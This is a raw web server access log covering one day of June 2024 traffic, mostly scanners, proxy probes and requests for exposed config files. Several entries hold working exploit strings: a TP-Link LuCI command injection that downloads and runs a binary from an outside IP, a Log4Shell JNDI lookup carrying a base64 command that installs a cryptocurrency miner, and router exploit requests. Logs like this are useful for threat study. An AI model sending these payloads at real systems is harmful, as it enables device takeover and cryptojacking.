206.168.32.100 - - [14/Jun/2024:00:35:52 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.100 - - [14/Jun/2024:00:35:56 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.100 - - [14/Jun/2024:00:35:56 +0200] "GET /favicon.ico HTTP/1.1" 404 729 205.210.31.233 - - [14/Jun/2024:00:51:15 +0200] "-" 400 1930 205.210.31.233 - - [14/Jun/2024:00:51:16 +0200] "-" 400 1930 87.121.69.27 - - [14/Jun/2024:01:10:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [14/Jun/2024:01:38:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.244.36.236 - - [14/Jun/2024:01:55:06 +0200] "GET / HTTP/1.1" 200 1895 95.168.56.3 - - [14/Jun/2024:02:08:06 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.27 - - [14/Jun/2024:02:35:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [14/Jun/2024:02:45:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F66.187.6.155%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.141.86.171 - - [14/Jun/2024:02:47:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.62.197.233 - - [14/Jun/2024:02:49:32 +0200] "-" 400 1930 180.144.61.13 - - [14/Jun/2024:02:49:57 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 159.89.143.132 - - [14/Jun/2024:02:56:43 +0200] "-" 400 1930 159.89.143.132 - - [14/Jun/2024:02:56:44 +0200] "-" 400 1930 159.89.143.132 - - [14/Jun/2024:02:56:44 +0200] "GET / HTTP/1.1" 200 1895 159.89.143.132 - - [14/Jun/2024:02:56:44 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 159.89.143.132 - - [14/Jun/2024:02:56:45 +0200] "-" 400 1930 45.128.232.152 - - [14/Jun/2024:02:56:55 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [14/Jun/2024:02:56:55 +0200] "-" 400 1930 45.128.232.152 - - [14/Jun/2024:02:56:55 +0200] "-" 400 1930 45.128.232.152 - - [14/Jun/2024:02:56:55 +0200] "-" 400 1930 103.252.136.86 - - [14/Jun/2024:02:59:02 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 84.54.51.156 - - [14/Jun/2024:02:59:28 +0200] "GET / HTTP/1.1" 200 1895 199.45.154.55 - - [14/Jun/2024:03:29:40 +0200] "GET / HTTP/1.1" 200 1895 199.45.154.55 - - [14/Jun/2024:03:29:49 +0200] "GET / HTTP/1.1" 200 1895 199.45.154.55 - - [14/Jun/2024:03:29:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.156.71.239 - - [14/Jun/2024:05:25:47 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 87.121.69.27 - - [14/Jun/2024:05:28:25 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.244.36.236 - - [14/Jun/2024:05:38:57 +0200] "GET / HTTP/1.1" 200 1895 94.156.71.249 - - [14/Jun/2024:06:25:47 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 104.218.54.174 - - [14/Jun/2024:06:32:49 +0200] "HEAD / HTTP/1.1" 200 - 104.218.54.174 - - [14/Jun/2024:06:32:49 +0200] "GET / HTTP/1.1" 200 1895 45.156.128.41 - - [14/Jun/2024:06:51:59 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [14/Jun/2024:07:39:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 106.75.166.204 - - [14/Jun/2024:07:46:14 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 739 91.92.245.67 - - [14/Jun/2024:07:51:54 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [14/Jun/2024:07:51:54 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 64.62.156.58 - - [14/Jun/2024:07:55:57 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.55 - - [14/Jun/2024:07:56:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.53 - - [14/Jun/2024:07:56:41 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.52 - - [14/Jun/2024:07:56:52 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 45.156.130.6 - - [14/Jun/2024:08:01:40 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [14/Jun/2024:08:15:19 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [14/Jun/2024:08:15:23 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [14/Jun/2024:08:15:23 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.88.91.41 - - [14/Jun/2024:08:15:57 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 209.141.32.195 - - [14/Jun/2024:08:35:19 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 141.98.11.15 - - [14/Jun/2024:08:52:49 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 143.198.46.94 - - [14/Jun/2024:09:28:41 +0200] "-" 400 1930 143.198.46.94 - - [14/Jun/2024:09:28:41 +0200] "-" 400 1930 143.198.46.94 - - [14/Jun/2024:09:28:41 +0200] "GET / HTTP/1.1" 200 1895 143.198.46.94 - - [14/Jun/2024:09:28:42 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 143.198.46.94 - - [14/Jun/2024:09:28:42 +0200] "-" 400 1930 52.189.74.241 - - [14/Jun/2024:09:49:31 +0200] "-" 400 1930 172.245.131.82 - - [14/Jun/2024:10:04:02 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.238 - - [14/Jun/2024:10:59:14 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [14/Jun/2024:10:59:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F66.187.6.155%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 115.63.52.226 - - [14/Jun/2024:11:04:10 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740 115.63.52.226 - - [14/Jun/2024:11:04:10 +0200] "-" 400 1930 91.211.134.59 - - [14/Jun/2024:11:43:21 +0200] "GET / HTTP/1.0" 200 1895 78.108.177.51 - - [14/Jun/2024:11:43:29 +0200] "GET / HTTP/1.0" 200 1895 104.167.222.178 - - [14/Jun/2024:11:52:09 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 91.211.134.59 - - [14/Jun/2024:13:26:30 +0200] "GET /status HTTP/1.1" 404 724 91.211.134.59 - - [14/Jun/2024:13:26:30 +0200] "GET /stat HTTP/1.1" 404 722 106.75.166.204 - - [14/Jun/2024:13:33:22 +0200] "GET /.git/config HTTP/1.1" 404 733 87.121.69.27 - - [14/Jun/2024:14:33:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [14/Jun/2024:14:44:11 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [14/Jun/2024:14:44:11 +0200] "-" 400 1930 45.128.232.152 - - [14/Jun/2024:14:44:11 +0200] "-" 400 1930 45.128.232.152 - - [14/Jun/2024:14:44:11 +0200] "-" 400 1930 87.121.69.27 - - [14/Jun/2024:14:55:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [14/Jun/2024:15:15:39 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 216.9.227.49 - - [14/Jun/2024:15:33:02 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [14/Jun/2024:15:50:50 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 185.244.36.236 - - [14/Jun/2024:15:56:20 +0200] "GET / HTTP/1.1" 200 1895 174.138.2.203 - - [14/Jun/2024:15:59:56 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:56 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:58 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [14/Jun/2024:15:59:59 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 91.92.245.67 - - [14/Jun/2024:16:20:06 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [14/Jun/2024:16:20:07 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 118.194.236.134 - - [14/Jun/2024:16:22:56 +0200] "-" 400 1930 118.194.236.134 - - [14/Jun/2024:16:23:07 +0200] "GET / HTTP/1.1" 200 1895 118.194.236.134 - - [14/Jun/2024:16:23:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 118.194.236.134 - - [14/Jun/2024:16:23:27 +0200] "GET /robots.txt HTTP/1.1" 404 728 118.194.236.134 - - [14/Jun/2024:16:23:28 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 161.35.29.34 - - [14/Jun/2024:16:42:22 +0200] "-" 400 1930 161.35.29.34 - - [14/Jun/2024:16:42:22 +0200] "-" 400 1930 161.35.29.34 - - [14/Jun/2024:16:42:22 +0200] "-" 400 1930 45.148.10.174 - - [14/Jun/2024:17:03:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F66.187.6.155%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [14/Jun/2024:17:03:56 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 103.252.136.86 - - [14/Jun/2024:17:15:57 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.156.129.44 - - [14/Jun/2024:17:56:04 +0200] "GET / HTTP/1.1" 200 1895 45.156.129.52 - - [14/Jun/2024:18:51:18 +0200] "GET / HTTP/1.1" 200 1895 66.240.236.119 - - [14/Jun/2024:19:04:54 +0200] "GET / HTTP/1.1" 200 1895 66.240.236.119 - - [14/Jun/2024:19:04:55 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.32.110 - - [14/Jun/2024:19:06:56 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [14/Jun/2024:19:06:59 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [14/Jun/2024:19:06:59 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [14/Jun/2024:19:35:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 104.168.70.165 - - [14/Jun/2024:20:00:55 +0200] "GET / HTTP/1.1" 200 1895 45.84.89.2 - - [14/Jun/2024:20:46:50 +0200] "-" 400 1930 185.100.87.136 - - [14/Jun/2024:21:52:19 +0200] "-" 400 1930 185.100.87.136 - - [14/Jun/2024:21:52:19 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 141.98.11.15 - - [14/Jun/2024:22:01:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [14/Jun/2024:22:15:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.214.55.144 - - [14/Jun/2024:22:39:04 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//178.215.224.166:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 1215 87.121.69.27 - - [14/Jun/2024:23:25:34 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804